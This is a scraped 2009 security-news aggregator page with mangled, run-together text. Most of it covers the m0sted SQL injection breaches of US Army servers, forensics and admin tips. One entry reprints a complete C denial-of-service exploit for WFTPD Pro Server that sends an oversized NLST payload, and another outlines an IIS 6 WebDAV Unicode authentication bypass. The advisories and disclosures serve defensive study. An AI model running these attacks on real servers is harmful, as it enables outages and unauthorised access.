05:21:22 - Security Bloggers Network : Old-school0403jpgSQL Injection - The "Old School" of Web applicationattacks is still alive and well As reported in Information week:A known computer hacking clan with anti-American leanings hassuccessfully broken into at least two sensitive Web serversmaintained by the US Army, InformationWeek has learnedexclusivelyInvestigators believe the hackers used a technique called SQLinjection to exploit a security vulnerability in Microsoft's SQLServer database to gain entry to the Web serversWith all the talk about CSRF, Clickjacking and others, it just goes toshow that you can't ignore the basicsHere at Imperva we've beenaddressing these issues at the database and Web application layer foryears with the Imperva SecureSphere Web Application Firewall WAF,Database Firewall, and Database Activity Monitoring DAM solutionsIn addition to the Imperva SecureSphere products, Imperva has createdan extensive glossary detailing a number of attacks such as SQLInjection: ADC Glossary Also, Imperva has published to YouTube anumber of educational video demonstrations illustrating exactly howthese attacks work from an attacker's perspective so thatorganizations might better understand and protect themselves* SQL Injection Basics 1* SQL Injection Basics 2* SQL Injection Basics 3* Blindfolded SQL Injection* SQL Injection Signature EvasionAnd man more educational videos on the Imperva YouTube Channelhttp://www.secuobs.com/revue/news/104648.shtmlhttp://www.secuobs.com/revue/news/104648.shtml 2009-06-02 05:18:25 - News : Red Hat Monday introduced an open source application server strategycalled JBoss Open Choice and a trio of upgraded middleware platformsthat adhere to an architecture that is customized using componentsread moreIMAGEhttp://www.secuobs.com/revue/news/104642.shtmlhttp://www.secuobs.com/revue/news/104642.shtml 2009-06-02 02:45:36 - Security Bloggers Network : Department of Defence and other investigators, are investigating two USArmy web server breaches which were never publicly disclosed On 19thSeptember 2007, and 26th January 2008, a Turkish hacker group known as“m0sted” successfully probed 2 US Army web servers, by running a SQLinjection attack against the web servers, which exploited a securityvulnerability http://www.secuobs.com/revue/news/104611.shtmlhttp://www.secuobs.com/revue/news/104611.shtml 2009-06-01 21:40:26 - News : Intel Corp has once again delayed the release of its next-generationItanium server processor to develop undisclosed "applicationscalability" enhancementsThe schedule set May 21 calls for the server chip, code-named Tukwila,to ship in the first quarter of 2010read moreIMAGEhttp://www.secuobs.com/revue/news/104536.shtmlhttp://www.secuobs.com/revue/news/104536.shtml 2009-06-01 19:45:58 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/104512.shtmlhttp://www.secuobs.com/revue/news/104512.shtml 2009-06-01 19:34:45 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Quelques vulnérabilités et problèmes de sécurité ont été identifiés dansIBM WebSphere Application Server, où certaines ont des impactsinconnus et les autres pourraient être exploitées par des personnesmalintentionnées pour divulguer des informations sensibleshttp://www.secuobs.com/revue/news/104503.shtmlhttp://www.secuobs.com/revue/news/104503.shtml 2009-06-01 16:56:39 - Information Security Resources : Excerpts From CNet Hackers based in Turkey penetrated two US Army Webservers and redirected traffic from those Web sites to other pages,including one with anti-American and anti-Israeli messages, accordingto a report in InformationWeekhttp://www.secuobs.com/revue/news/104429.shtmlhttp://www.secuobs.com/revue/news/104429.shtml 2009-06-01 16:38:12 - Channel 9 : IMAGEWhile Max is away our dear friend Paul stepped in and hedefinitely wasn't shy to voice his opinion He's got his very longfinger on the pulse of Microsoftthese were the beats:And Interview with the Bing teamBing goes liveVPlay for Surface DJ'sAre you ready for Zune HDCelebrifeed for Hollywood Twitsand a challenge for some badass giveaways Watch and playhttp://www.secuobs.com/revue/news/104407.shtmlhttp://www.secuobs.com/revue/news/104407.shtml 2009-06-01 10:03:31 - Security Bloggers Network : I’m late to the party with this article Apparently, there are hackersthat are ill disposed to the US Who knew From Information Week: Thehackers, who collectively go by the name “m0sted” and are based inTurkey, penetrated servers at the Army’s McAlester Ammunition Plant inMcAlester, Okla, and at the US Army Corps of Engineers’ http://www.secuobs.com/revue/news/104341.shtmlhttp://www.secuobs.com/revue/news/104341.shtml 2009-05-31 20:06:59 - Windbg by Volker von Einem : Once you've fallen in love with your own symbol server you mightdiscover bad performance the bigger the symbol store growsWe've recently moved our private symbol server onto a new server andfound in the symhttpdoc the following:Normally files are placed in a symbol store with a single tierdirectory structure in which a single subdirectory exists to storeall versions of a certain filename Such a tree may look like thisc:symstoretdlldllc:symstoretdllpdbc:symstorekernel32dllc:symstorekernel32pdbHowever if you are going to store a massive amount of filenames,you may prefer to use the two-tier structure To do this, place afile called index2txt in the root of c:symstore The contents ofthe file are of no importance This would result in a tree thatlooks like thisc:symstorettdlldllc:symstorettdllpdbc:symstorekekernel32dllc:symstorekekernel32pdbThe added layer of directories allows you to use DFS or directoryjunctions to manage and split up your filesPutting the empty index2txt in the root is not really a task tomention, but what happens to all the files you have added over timeAs a software developer I tend to do things the lazy way So rerunningsymstore on the old configurations is something for those havingkilled father and motherThanks to the power of LINQ and NConsoler I could write a handy toolin minutes that does the migration stuff for me and youimageLay back and feel the speed ;-Please backup the symbol store before migration - I give nowarrantyIMAGEhttp://www.secuobs.com/revue/news/104203.shtmlhttp://www.secuobs.com/revue/news/104203.shtml 2009-05-31 19:53:45 - LiquidWorm's Blog : ========================================================/*********************************************************************************************************** Title: WFTPD Pro Server 33001 pre auth Multiple Remote Denialof Service Vulnerabilities** Summary: Professional FTP server for Windows NT / 2000 / XP / 2003** Desc: WFTPD Pro Server 33001 suffers from multiple remotevulnerabilities which resolves* in denial of service Several commands are vulnerable including:LIST, MLST, NLST, NLST -al,* STAT and maybe more** Product web page: http://wwwwftpdcom/** Tested on Microsoft Windows XP Professional SP2 English** Vulnerability discovered by Gjoko 'LiquidWorm' Krstic** liquidworm t00t gmail w00t com** http://wwwzeroscienceorg/** 26012009*********************************************************************************************************/#include #include #include #include #include #include #include #include #include void headervoid;int main int argc, char *argv{int sckt = 0, sfd = 0;unsigned char payload="x4Ex4Cx53x54x20x2Dx61x6Cx20" // NLST -al// "x4Cx49x53x54 - LIST, x4Dx4Cx53x54 - MLST, x4Ex4Cx53x54- NLST, x53x54x41x54 - STAT +x20"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"// 1400 bytes"xDxA";header;ifargc = 2{printf"Usage: %s ip", argv0;return EXIT_SUCCESS;}struct sockaddr_in dos_ftp;sfd = socketAF_INET, SOCK_STREAM, 0;ifsfd 0{perror"Socket";printf"Error creating socket";return1;}printf"+ Socket created";sleep 1;memsetetdos_ftp, 0x0, sizeofdos_ftp;dos_ftpsin_family = AF_INET;dos_ftpsin_addrs_addr = inet_addrargv1;dos_ftpsin_port = htons21;sckt = connectsfd, struct sockaddr * etdos_ftp, sizeofdos_ftp;ifsckt 0{perror"Connect";printf"Error connecting";return1;}printf"+ Connection established";sleep 1;printf"+ Sending malicious payload to %s ", argv1;sleep2;sendsfd, payload, sizeofpayload, 0;printf"+ Malicious payload succesfully sent";sleep 1;printf"+ WFTPD on %s has crashed", argv1;close sfd;return0;}void header{printf"--------------------------------------------------------------------------------";printf" WFTPD Pro Server 33001 pre auth Remote Denial ofService Exploit";printf" by LiquidWorm ";printf"--------------------------------------------------------------------------------";}========================================================http://wwwpacketstormsecurityorg/filedesc/wftpdpro_dosctxthtmlhttp://wwwsecurityfocuscom/bid/33426http://wwwzeroscienceorg/codes/wftpdpro_doscIMAGEhttp://www.secuobs.com/revue/news/104129.shtmlhttp://www.secuobs.com/revue/news/104129.shtml 2009-05-31 19:49:37 - HyP : Depuis pas mal de temps la scène Français se trouve privé d'un serveurSILC, je me lance donc sur ce projet fastidieux avec KmkZ, vous sereztenu au courant de ce projet Si vous avez des suggestions n'hésitez ales soumettreIMAGEhttp://www.secuobs.com/revue/news/104075.shtmlhttp://www.secuobs.com/revue/news/104075.shtml 2009-05-31 19:49:19 - Hacking Exposed Computer Forensics Blog : Hello Reader,To the end user the blackberry server is what their blackberries gettheir email from But there are multiple methods of communication ablackberry is capable of relaying, logging and recovering by aninformed investigator1 Email2 SMS3 Blackberry Messenger4 PIN Messaging5 Phone Call LogThe blackberry server will create the following type of logs in total:* ALRT - BES Alert* BBIM - BlackBerry Instant Messenger 41* BBUA - BlackBerry User Administration Service BRK* CBCK - Backup Connector* CEXC - Exchange PIM Connector* CMNG - Management Connector* CTRL - BlackBerry Controller* DISP - BlackBerry Dispatcher* MAGT - BlackBerry Mailbox Agent aka BlackBerry Messaging Agent* MDAT - Mobile Data Services* MDSS - MDS Services 41* MDSS-DISCOVERY - MDS Services 41* POLC - Policy Service* ROUT - Router* SYNC - BlackBerry SyncServer* PhoneCallLog 41* PINLog 41* SMSLog 41Thanks Wikipediahttp://enwikipediaorg/wiki/BlackBerry_Enterprise_Server1 Email – The blackberry server logs will store when a deviceconnects to the server to pull email and delivers mail and othermessages When you are dealing with a time sensitive issue of dida message get received/sent/deleted from a blackberry these logsmay be your best source of evidence if a enough time has passed tolet the message be deleted from the blackberry device itselfbefore imaging Regarding imaging blackberry devices I personallyuse Paraben's device seizure found herehttp://wwwparaben-forensicscom/catalog/product_infophpproducts_id=405to do the device acquisitionThe MAGT log with a name like "_MAGT_01_20090108_0001txt" will be a listing of every actiontaking place regarding the delivery of messages/calendaritems/etc to every blackberry communicating with the server Youwill find them in multiple segments per day This is the place tolook if the timing of the delivery/deletion/forwarding of amessage from a blackberry is at issue2 SMS – When configured to do so the blackberry server will loginto a csv file the following fields:"NameID,"Email Address","Type of Message","To","From","CallbackPhone Number","Body","Send/Received Date","Server LogDate","Overall Message Status","Command","UID"With a file name such as "SMSLog_20070927csv" with one log beingcreated per dayThe file is written out in utf16 so be aware of that if you toparse it out1 Blackberry Messenger – This is a blackberry IM program thataccording to my current research will not be logged on the serverwithout creating an account to relay all the messages to Withoutprior configuration the only way to recover these messages is fromthe device itself1 PIN Messaging – This is the PIN messaging log PIN Messages arethose messages sent between blackberries directly through theblackberry server directed to the PIN assigned to the blackberryby the server By default the blackberry server will log into acsv the following fields:"NameID,"PIN","Email Address","Type ofMessage","To","Cc","Bcc","From","Subject","Body","Send/ReceivedDate","Server Log Date","Overall Message Status","Command","UID"With a file name such as "PINLog_20070927csv" with one log beingcreated per dayThe file is written out in utf16 so be aware of that if you toparse it out I'm writing a parser now to dump them all into amysql database that I will post when I correct a weird multilinemessage that I've found Special bonus it's a perl script thatcorrectly handles utf161 Phone Call Log – This is a log of all of the calls being made outof the blackberry devices, note this only applies to calls made onblackberries connected to this blackberry server This includesmissed calls, outgoing calls and incoming calls that I've seen todate By default the blackberry server will log into a csv thefollowing fields:"NameID","Type of Call","Name","Phone Number","StartDate","Server Log Date","Elapsed Time","Memo","Command","UID"With a file name such as "PhoneCallLog_20070927csv" with one logbeing created per dayThe file is written out in utf16 so be aware of that if you toparse it outAll of the CSV files will load into excel directly if you import them,otherwise if there is a large number of dates in question I wouldrecommend parsing them into some kind of database so you can pullrecords by the user's name or PINDepending in the current configuration of the blackberry server afterthe date in question or the changes you make to a server now inpreparation if you are internal a large amount of responsive datathat the user may not believe exists will be available to you Don'texpect your blackberry admin to be aware of this data existing butmake sure to ask for a copy of the log director regardlessIMAGEhttp://www.secuobs.com/revue/news/104064.shtmlhttp://www.secuobs.com/revue/news/104064.shtml 2009-05-31 19:29:44 - Fast Horizon : HBGary has been lifting some heavy iron, testing a variety of largememory configurations over the last few weeks The latest version ofHBGary Responder now sets the milestone: 64 gigabytes physical memoryanalysis - a sizeable snapshot indeed This makes Responder aserver-class product This is an important step forward for HBGary, asthe Digital DNA and malware analysis capabilities can now be appliedagainst critical servers in the Enterprise Large memory footprintscan be found on server class machines running Windows Vista, 2003, and2008 Ensuring servers remain free of rootkits and malware is crucialfor regulatory compliance A case in point, Visa recently announcedthat PCI compliance was being revoked for both RBS WorldPay andHeartland, due to malware intrusions and subsequent breach ofsecurity Early detection of an intrusion can prevent data theft, asmalware typically infects a system and remains there for quite sometime A recent data-breach study by Verizon spanning over 4 years and500 intrusions reports that over 70% of victim companies had beencompromised for over a year before the intrusion was detected FISMA,PCI-DSS, and HIPPA all mandate various forms of intrusion detection tohelp limit the scope of damage caused by an intrusion Sound defensein depth strategy advocates that Enterprises monitor server memory forzero-day malware and rootkitsIMAGEhttp://www.secuobs.com/revue/news/103993.shtmlhttp://www.secuobs.com/revue/news/103993.shtml 2009-05-31 19:23:29 - Invisible Denizen : In doing some research on IE7 permissions I searched high and low on theMSDN and similar places, and couldn't find a complete list of defaultsettings So, I created the following spreadsheet to document what wasavailable, by default, for the various security zones 'Intranet','Internet', etc This was a quick analysis and only includes thosewith 'simple' registry values like 0, 1, etc, and doesn't parse outany of the more complex values See this MS link for more infoWhen I created it, I looked at a fresh XP SP3 install and an almostnew Server 2003 SP1 install I followed the rules for precedence whenconflicting rules are in place eg HKLM vs HKCU, Domain policy overdefault HKLM/HKCU, etc and came up with the final results At somepoint, I'll go back and do it properly with complete documentation ofthe sources of the various settings, but in the mean time if anyoneelse would find this useful, here ya goSpecifically, the settings that may be interested to look at are:* 1206 Miscellaneous: Allow scripting of Internet Explorer Webbrowser control ^* 1208 ActiveX controls and plug-ins: Allow previously unusedActiveX controls to run without prompt ^* 1209 ActiveX controls and plug-ins: Allow Scriptlets* 1407 Scripting: Allow Programmatic clipboard access* 1607 Miscellaneous: Navigate sub-frames across different domains* 1805 Launching programs and files in webview #* 1806 Miscellaneous: Launching applications and unsafe files* 1809 Miscellaneous: Use Pop-up Blocker ** ^* 1A04 Miscellaneous: Don't prompt for client certificate selectionwhen no certificates or only one certificate exists * ^* 1A05 Allow 3rd party persistent cookies ** 1A10 Privacy Settings ** 2102 Miscellaneous: Allow script initiated windows without size orposition constraints ** ^* 2103 Scripting: Allow status bar updates via script ^* 2104 Miscellaneous: Allow websites to open windows without addressor status bars ^* 2105 Scripting: Allow websites to prompt for information usingscripted windows ^* 2200 Downloads: Automatic prompting for file downloads ** ^* 2201 ActiveX controls and plug-ins: Automatic prompting forActiveX controls ** ^* 2301 Miscellaneous: Use Phishing Filter ^* 1207 Reserved #* 1408 Reserved #* 1807 Reserved ** #* 180A Reserved #* 180D Reserved #Lastly, if any of you who review this notice your settings at aredifferent from these, please drop me an emailThe default IE7 settings are located at the below registry entries Ifpolicy-enforced settings are in placed, they override whatever is sethereHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet SettingsHKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionInternet SettingsDefault Windows IE7 PermissionsIMAGEhttp://www.secuobs.com/revue/news/103948.shtmlhttp://www.secuobs.com/revue/news/103948.shtml 2009-05-31 16:43:38 - Phn1x Hamsterswheel : Running out of time to play with this bug, still need to pack for myflight early tmw morning Code at the bottom results in a DOS Ifiddled a little with the POC but throwing that much data at it doesnot seem to do anything, almost as if the program is just droppinghttp://www.secuobs.com/revue/news/103783.shtmlhttp://www.secuobs.com/revue/news/103783.shtml 2009-05-31 11:11:26 - Offensive Security Blog : Having an updated, shiny kernel has a few downsides…kernel dependentsoftware seldom keep up with the newest Linux Kernel releases Perhapsthe most notorious for this is VMware Getting VMware installed on a26294 kernel can be challenging We made a short movie on how to dothis, in the simplest way we could think http://www.secuobs.com/revue/news/103725.shtmlhttp://www.secuobs.com/revue/news/103725.shtml 2009-05-30 23:32:37 - Security Bloggers Network : IIS 6 sites with the WebDAV extension enabled may be vulnerable toauthentication bypass because of a bug in the way that the extensionhandles Unicode charactersCutting the URI path with random Unicode characters allows hackers tobypass the access control list Depending on the permissions of theWeb server files, a hacker would be able to retrieve user names andpasswords, upload, overwrite and delete files, or run malicious codeUse the WebTuff utility to check your system vulnerability:1 Try to retrieve the file at the given URI using a simple WebDAV GETcommand2 Try to retrieve the file at the given URI using a simple WebDAV GETcommand, cutting the URI with these Hex | Unicode characters: %c0 and%af3 Save the retrieved file locally and / or report server responseDownload WebTuff Tool:webTuff link zip file containing win32 binary + Python source codeWebTuff-MD5 MD5 hash of WebTuff binaryhttp://wwwapplicurecom/News/WebDAV_ExploitIMAGE IMAGE IMAGE IMAGE IMAGE IMAGEhttp://www.secuobs.com/revue/news/103620.shtmlhttp://www.secuobs.com/revue/news/103620.shtml 2009-05-30 13:36:55 - Security Bloggers Network : digg_url ="http://blogsmsdncom/vbertocci/archive/2009/05/28/the-id-element-weekly-caleb-baker-on-geneva-server-and-saml2-0-interoperabilityaspx";digg_title= "The Id Element weekly: Caleb Baker on Geneva Server and SAML20Interoperability";digg_bgcolor = "#FFFFFF";digg_skin ="normal";digg_url = undefined;digg_title = undefined;digg_bgcolor =undefined;digg_skin = undefined;IMAGEimageThis week the Id Element features my good friend Caleb, partner incrime, as he chats with Donovan about the relationship Geneva Serverand SAML-P Those are 21 minutes of pure goodness: frombehind-the-scenes of the various Novell et Sun interop activities forbeta 2 to practical demonstrations of how to configure Geneva Serverfor producing and consuming SAML-P, you are guaranteed to learnssomething useful Tune inIMAGEhttp://www.secuobs.com/revue/news/103509.shtmlhttp://www.secuobs.com/revue/news/103509.shtml 2009-05-30 05:13:58 - gHacks technology news : Apple iTunes is one of the most popular music managers and players Whileit can be used to play music locally it does not offer any means toplay music over the Internet which might be interesting for users whowork on different computer systems, eg a home computer and one atthe office Pulptunes is http://www.secuobs.com/revue/news/103384.shtmlhttp://www.secuobs.com/revue/news/103384.shtml 2009-05-30 05:03:09 - MX Logic Security News : Turkish hackers calling themselves m0sted were able to break into a USArmy server in January and previously hacked a server for the ArmyCorps of Engineers, according to InformationWeekHackers used an SQL injection attack to exploit a securityvulnerability in Microsoft's SQL Server database, according toofficials cited in the reportThe hacked servers were at the McAlister Ammunition Plant in Oklahomaand the US Army Corps of Engineers' Transatlantic Center inVirginiaVisitors to the McAlister plant's website on January 26th wereredirected to a website containing messages protesting climate changeIn September 2007, a similar attack on the Army Corps of Engineersredirected visitors to wwwm0stednet, which contained anti-Americanand anti-Israeli messages and images, InformationWeek reportedThe US Department of Defense, which has reportedly been consideringimplementing a cybercommand to coordinate IT security andcyberwarfare, subpoenaed records from Google, Microsoft and Yahoo totrack the identities of the hackersIn August 2007, m0sted hacked a United Nations website to post amessage that said "Hacked By Kerem125 m0sted and Gsy," according toreports "That is CyberProtest Hey Ysrail and Usa dont kill childrenand other people Peace for ever No war"ADNFCR-1765-ID-19194542-ADNFCRhttp://www.secuobs.com/revue/news/103352.shtmlhttp://www.secuobs.com/revue/news/103352.shtml 2009-05-29 23:53:36 - Computer Security News : An anti-American group of hackers have broken into at least two of theUS Army's critical web servers, according to an exclusive report byInformationWeek http://www.secuobs.com/revue/news/103322.shtmlhttp://www.secuobs.com/revue/news/103322.shtml 2009-05-29 23:15:00 - Security Bloggers Network : Question: How can I find IIS servers in my environment running WebDAVAnswer: You can use the IIS Manager interface on the server to quicklytell whether the server is running WebDAV If you want to do soremotely, you can issue an HTTP request to the server directly:$ telnet server 80OPTIONS / HTTP/11Host: serverAccept: */*An extra Enter on the blank line after the Accept will complete therequest for the webserverIf you get an HTTP response that looks like the one below, the serveris running WebDAVHTTP/11 200 OKDate: Wed, 20 May 2009 00:52:58 GMTServer: Microsoft-IIS/60X-Powered-By: ASPNETMS-Author-Via: DAVContent-Length: 0Accept-Ranges: noneDASL: DAV: 1, 2Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCHAllow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCKCache-Control: privateTo evaluate the response for existence of WebDAV, use the followinglogic:* Received 2xx response status to OPTIONS request made to root ofsite* Response contains DAV header with value 1,2* Response contains MS-Author-Via header which contains DAV value* Response DOES NOT contain X-MSDAVEXT header Existence of thismeans its Sharepoint’s DAVTo test a server that only accepts HTTPS connections, you can use atool like wfetchhttp://blogstechnetcom/srdIMAGE IMAGE IMAGE IMAGE IMAGE IMAGEhttp://www.secuobs.com/revue/news/103237.shtmlhttp://www.secuobs.com/revue/news/103237.shtml 2009-05-29 18:26:37 - Les derniers documents du CERTA. : Une vulnérabilité dans Sun Java System Portal Server permet à unutilisateur distant malintentionné de réaliser une attaque de typeinjection de code indirectehttp://www.secuobs.com/revue/news/103144.shtmlhttp://www.secuobs.com/revue/news/103144.shtml 2009-05-29 18:04:55 - SANS Internet Storm Center, InfoCON green : For all of you running around with a Blackberry, be careful of openingpdf files morehttp://www.secuobs.com/revue/news/103118.shtmlhttp://www.secuobs.com/revue/news/103118.shtml 2009-05-29 10:23:08 - Rootsecure.net : Information Week: Anti-US Hackers Infiltrate Army Servers "Exclusive:Defense Department investigators subpoena records from Google,Microsoft, and Yahoo in connection with ongoing probe"http://www.secuobs.com/revue/news/103051.shtmlhttp://www.secuobs.com/revue/news/103051.shtml 2009-05-29 09:30:49 - Channel 9 : IMAGEIn this episode Caleb Baker, Sr SDET on the Federated Identity team,discusses Geneva Server beta 2 and SAML 20 interoperability Calebwas instrumental in testing Geneva Server with Sun’s OpenSSOEnterprise and Novell’s Access Manager products The whitepapers forthese interop tests are available here Caleb also demonstrates how toconfigure Geneva Server both as a SAML Identity Provider and a ServiceProvider For those using Geneva Server for SAML 20 interop testing,be sure to post your comments and experiences on the Geneva forumURL references:The Identity Developer Training Kit"Geneva" Server interoperability whitepapers“Geneva” Forum on MSDN"Geneva" Team BlogMicrosoft code name "Geneva"The Identity key topic on Channel 9http://www.secuobs.com/revue/news/102972.shtmlhttp://www.secuobs.com/revue/news/102972.shtml 2009-05-29 03:16:56 - Hack In The Box : A known computer hacking clan with anti-American leanings hassuccessfully broken into at least two sensitive Web servers maintainedby the US Army, InformationWeek has learned exclusively Departmentof Defense and other investigators are currently probing the breaches,which have not been publicly disclosed The hackers, who collectivelygo by the name "m0sted" and are based in Turkey, penetrated servers atthe Army's McAlester Ammunition Plant in McAlester, Okla, and at theUS Army Corps of Engineers' Transatlantic Center in Winchester, VaThe breach at the McAlester munitions plant occurred on Jan 26,according to records of the investigation obtained by InformationWeekOn that date, Web users attempting to access the plant's site wereredirected to a Web page that featured a protest against climatechange On Sept 19, 2007, the same hackers electronically broke intoArmy Corps of Engineers' servers That hack sent Web users towwwm0stednet The page, at the time, contained anti-American andanti-Israeli rhetoric and images, records show It currently appearsto be an Internet landing spot that features airline reservationlinkshttp://www.secuobs.com/revue/news/102933.shtmlhttp://www.secuobs.com/revue/news/102933.shtml 2009-05-29 02:58:38 - Security for the Masses : Information week reprots that Turkish hac kers broke into two differentweb servers From the article:"The hackers, who collectively go by the name "m0sted" and are basedin Turkey, penetrated servers at the Army's McAlester Ammunition Plantin McAlester, Okla, and at the US Army Corps of Engineers'Transatlantic Center in Winchester, Va "See Information WeekIMAGEhttp://www.secuobs.com/revue/news/102919.shtmlhttp://www.secuobs.com/revue/news/102919.shtml 2009-05-28 21:31:41 - terminal23 : Installing VMWare on Ubuntu is surprisingly easy these days It has beena couple major releases since I did so, but this weekend I rebuilt myVM host boxI installed Ubuntu 904 server and chose the Virtual Host option Ireally don't have a good reason why other than that's what the boxwould be Once done, this leaves the box at a command line promptAfter a little reading, I found out that VMWare Server 2 now installswith a web-based admin interface and not the normal GUI-requiredinterface Whoa, big improvement I don't need Gnome anymoreThe rest of the installation went smoothly with the only difficultycoming from downloading the VMWare Server 2 tarball through Lynxhint: sign up for a throw-away account on a different box, then justsign in on Lynx But after that, no more magic tricks to get VMWareto work on Ubuntu I accepted all defaults other than VM storagelocation I had a passwd set for root, so I could use root for now asthe loginhttp://www.secuobs.com/revue/news/102812.shtmlhttp://www.secuobs.com/revue/news/102812.shtml 2009-05-28 20:39:39 - News : Worldwide server unit shipments declined 265 percent year-over-yearin the first quarter to around 149 million units, the largest unitshipment decline in five years, IDC saidread moreIMAGEhttp://www.secuobs.com/revue/news/102728.shtmlhttp://www.secuobs.com/revue/news/102728.shtml 2009-05-28 20:29:07 - Office of Inadequate Security : Tom Murphy of Associated Press reports that Aetna, Inc learned that aweb site maintained by a vendor had been compromised earlier thismonth Files on the web site included about 450,000 email addressesfor job applicants, but even more ominously, names, addresses,employment histories, and Social Security numbers of about 65,000current and http://www.secuobs.com/revue/news/102701.shtmlhttp://www.secuobs.com/revue/news/102701.shtml 2009-05-28 20:13:59 - 8080 PROXY : Read on to how to use proxy servers effectively to protect onlinesecurity and privacy and speed up the computers that are connected toa proxy server In a network of computers, an application program orthe computer system will function as a server It acts as a link toget the information required from the 